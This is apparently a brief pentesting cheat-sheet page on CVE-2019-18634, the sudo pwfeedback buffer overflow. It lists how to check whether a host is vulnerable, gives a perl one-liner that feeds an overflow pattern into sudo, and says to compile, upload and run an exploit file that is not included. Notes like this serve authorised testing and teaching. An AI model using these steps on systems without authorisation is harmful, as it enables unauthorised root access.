CVE-2019-18634 (pwfeedback)

sudo su root
su root

If you see * when typing in a password, that is the pwfeedback environment variable being enabled and indicates that machine may be vulnerable

sudo -V

Any Sudo version older than 1.8.26 is vulnerable

perl -e 'print(("A" x 100 . "\x{00}" x 50)' | sudo -S i

Compile exploit, upload and run

gcc -o bof exploit.c

Last updated 10 months ago

Was this helpful?